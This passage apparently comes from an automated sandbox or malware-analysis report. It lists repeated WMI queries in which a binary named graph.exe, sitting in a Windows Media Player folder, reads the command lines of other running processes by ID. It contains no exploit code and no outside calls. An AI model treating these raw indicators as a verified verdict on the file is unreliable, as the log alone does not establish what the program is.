                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
